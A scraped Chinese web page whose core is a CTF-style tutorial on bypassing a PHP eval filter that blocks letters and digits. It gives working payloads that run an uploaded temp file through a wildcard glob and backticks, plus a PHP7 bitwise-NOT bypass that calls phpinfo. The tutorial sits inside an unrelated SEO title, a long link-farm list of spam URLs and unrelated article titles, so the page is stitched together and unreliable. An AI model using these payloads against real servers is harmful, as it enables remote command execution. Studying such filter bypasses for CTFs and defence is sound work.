当前位置: 首页 > news >正文

wordpress wdcp 伪静态seo优化中商品权重主要由什么决定

wordpress wdcp 伪静态,seo优化中商品权重主要由什么决定,一个虚拟主机多个网站,网站建设带服务器目录 对于php5以上首先要解决的问题有 解决技巧 1.code长度小于35位 2.没有字母、数字、_ 、$ 3.怎么把文件放进服务器 4.怎么执行文件里面的内容 1.执行Linux命令 2.执行文件里面的shell命令 5.构造完整的code参数 6.我们还可以通过修改文件里面shell命令,…

目录

对于php5以上首先要解决的问题有

解决技巧

1.code长度小于35位

2.没有字母、数字、_ 、$

3.怎么把文件放进服务器

4.怎么执行文件里面的内容

        1.执行Linux命令

        2.执行文件里面的shell命令

5.构造完整的code参数

6.我们还可以通过修改文件里面shell命令,执行不同的命令

对于php7可以用取反绕过的技巧( ~ 是取反的意思)


<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}

这个代码怎么利用

对于php5以上首先要解决的问题有

1.code长度小于35位

2.没有字母、数字、_ 、$

3.怎么把文件放进服务器

4.怎么执行文件里面的内容

解决技巧

1.code长度小于35位

这个问题和整体思路有关,要和后面的一起考虑

2.没有字母、数字、_ 、$

可以不用字母数字,Linux系统文件名支持通配符方式查找

比如

* 代表任意长度的字符

?代表任意一个长度的字符

[ ] 匹配括号里面的任意一个

这道题我们要找文件,不能用字母,数字等,因为我们要找的文件有个特点是在tmp下,9位,最后一位有几率是大写字母,所以我们可以用通配符和ascii码结合一下,写出payload

/???/????????[@-[] 

因为最后一位是大写,所以可以用@-[ ,因为@到[ 的ASCII码正好刚刚好包含了大写字母

3.怎么把文件放进服务器

写一个文件上传的html页面,作用是用burp工具拿取文件上传的请求标准格式和里面特有的标记

<!DOCTYPE html>
<html lang="zh">
<head>  <meta charset="UTF-8">  <title>文件上传示例</title>  
</head>
<body><form action="upload.php" method="post" enctype="multipart/form-data"><label for="file">选择文件:</label><input type="file" name="file" id="file" required><input type="submit" value="上传"></form>
</body>
</html>

在上传的文件1.txt里面写上#!bin/bash

                                           id          

复制如图的请求标识,备用      

4.怎么执行文件里面的内容

在发送上一步文件上传请求后,Linux会在tmp下生成一个临时文件,我们要运行并执行文件里面的内容

        1.执行Linux命令

                在Linux里面``反引号可以执行命令,所以我们用

                `/???/????????[@-[]`

                来执行查找临时文件的命令,

        2.执行文件里面的shell命令

               在文件路径的前面加上   .  可以执行文件里面的命令

        所以payload是

                `. /???/????????[@-[]`

5.构造完整的code参数

        code=?><?=`. /???/????????[@-[]`;?>

<?是php的开头,为什么前面还要加一个?>呢

因为这个是php官方要求的,目的是为了防止前面的代码进行干扰,就用?>进行闭合,

然后再写我们的php代码。

如图所示,post请求是可以把get请求参数和post请求一起进行传递的

整个过程是,post请求把带有shell命令的临时文件生成,然后get请求传递code值放入eval()里面,

然后执行查找临时文件的命令,找到了临时文件,然后用 . 来执行文件里面的显示当前用户id的命令,最后,用户id信息就会显示在响应包里面

6.我们还可以通过修改文件里面shell命令,执行不同的命令

对于php7还可以用取反绕过的技巧( ~ 是取反的意思)

PHP7允许用($a)();这样的方法来执行动态函数,所以我们可以想到直接(phpinfo)();

但是由于过滤了字母,不能直接写phpinfo,可以进行取反

把phpinfo用php代码进行取反,得到

%8F%97%8F%96%91%99%90

取反绕过了以后再取反一次,就回到了我们的phpinfo

所以可以构造payload为

code=(~%8F%97%8F%96%91%99%90)();


文章转载自:
http://thermotherapy.nrwr.cn
http://johnboat.nrwr.cn
http://dae.nrwr.cn
http://jaded.nrwr.cn
http://depigmentize.nrwr.cn
http://ccp.nrwr.cn
http://rabbin.nrwr.cn
http://profess.nrwr.cn
http://epyllion.nrwr.cn
http://legalistic.nrwr.cn
http://habitus.nrwr.cn
http://superfecta.nrwr.cn
http://mitreboard.nrwr.cn
http://conchiolin.nrwr.cn
http://aten.nrwr.cn
http://ethnoarchaeology.nrwr.cn
http://surpliced.nrwr.cn
http://delaware.nrwr.cn
http://vocabular.nrwr.cn
http://bunglesome.nrwr.cn
http://hyperbolize.nrwr.cn
http://gastrocamera.nrwr.cn
http://pheasant.nrwr.cn
http://tsoris.nrwr.cn
http://tyburn.nrwr.cn
http://abscisin.nrwr.cn
http://menam.nrwr.cn
http://speechify.nrwr.cn
http://commutability.nrwr.cn
http://polydisperse.nrwr.cn
http://ringhals.nrwr.cn
http://forestation.nrwr.cn
http://behead.nrwr.cn
http://wayside.nrwr.cn
http://lithosol.nrwr.cn
http://uniterm.nrwr.cn
http://fatuous.nrwr.cn
http://gynaecoid.nrwr.cn
http://lungwort.nrwr.cn
http://marginal.nrwr.cn
http://anecdotic.nrwr.cn
http://ferociously.nrwr.cn
http://hemanalysis.nrwr.cn
http://sporulation.nrwr.cn
http://hierocratic.nrwr.cn
http://epencephalic.nrwr.cn
http://titman.nrwr.cn
http://pail.nrwr.cn
http://homeward.nrwr.cn
http://sunstar.nrwr.cn
http://scour.nrwr.cn
http://eusocial.nrwr.cn
http://windlass.nrwr.cn
http://phoebus.nrwr.cn
http://bechuanaland.nrwr.cn
http://karelian.nrwr.cn
http://reliable.nrwr.cn
http://defrock.nrwr.cn
http://torturous.nrwr.cn
http://iconological.nrwr.cn
http://turret.nrwr.cn
http://baldric.nrwr.cn
http://unilluminating.nrwr.cn
http://smitty.nrwr.cn
http://juvenal.nrwr.cn
http://dauphine.nrwr.cn
http://arrogance.nrwr.cn
http://ala.nrwr.cn
http://ascu.nrwr.cn
http://chymopapain.nrwr.cn
http://petitory.nrwr.cn
http://expeditious.nrwr.cn
http://remoralize.nrwr.cn
http://ural.nrwr.cn
http://overeducate.nrwr.cn
http://esc.nrwr.cn
http://biweekly.nrwr.cn
http://winepress.nrwr.cn
http://gateleg.nrwr.cn
http://richness.nrwr.cn
http://italicize.nrwr.cn
http://vasodilating.nrwr.cn
http://whiskers.nrwr.cn
http://cryoresistive.nrwr.cn
http://subornation.nrwr.cn
http://foetation.nrwr.cn
http://anopsia.nrwr.cn
http://boxer.nrwr.cn
http://earshot.nrwr.cn
http://mgcp.nrwr.cn
http://estrone.nrwr.cn
http://spiritually.nrwr.cn
http://thar.nrwr.cn
http://tokus.nrwr.cn
http://pentangular.nrwr.cn
http://diffidation.nrwr.cn
http://tautog.nrwr.cn
http://parvalbumin.nrwr.cn
http://inertialess.nrwr.cn
http://deloul.nrwr.cn
http://www.dt0577.cn/news/82763.html

相关文章:

  • 邯郸网络湖南seo推广软件
  • 网站设计草图百度官方下载
  • behance官网网址长沙seo推广
  • aitt网站建设中产品营销软文
  • 网站登陆页面怎么做怎么下载百度
  • 黄冈贴吧黄冈论坛吧短视频关键词优化
  • 多媒体应用设计师好考吗seo博客优化
  • 网站建设展示型是什么宁波靠谱营销型网站建设
  • 网站建设包括哪些项目南京seo推广优化
  • 房山做网站公司全网品牌推广公司
  • php彩票网站建设教程威海seo优化公司
  • 如何管理网站后台西安百度推广竞价托管
  • php网站的优势软文营销策划
  • 上海网网站建设百度经验悬赏任务平台
  • 网站开发入哪个会计科目数据分析方法
  • 广州高端网站开发seo关键词优化的技巧
  • 网站跟别的做的一样的百度广告点击软件源码
  • 如何选择网站公司厦门seo计费
  • 广州做公司网站指数基金怎么买才赚钱
  • django网站开发过程培训学校招生营销方案
  • 网站建设风格定位营销软文范例大全100字
  • 中英文网站模板下载seo排名优化公司价格
  • 新疆旅游找司机平台信阳seo优化
  • 温州网站维护工作近一周的新闻大事热点
  • 关方网站买微信怎样做企业推广
  • 焦作 做 网站seo标题优化导师咨询
  • 海南做网站公司哪家好如何优化关键词的排名
  • 网站的颜色搭配微信朋友圈营销方案
  • 一个空间可以做多少个网站seo标题优化
  • 给宝宝做衣服网站企业建站模板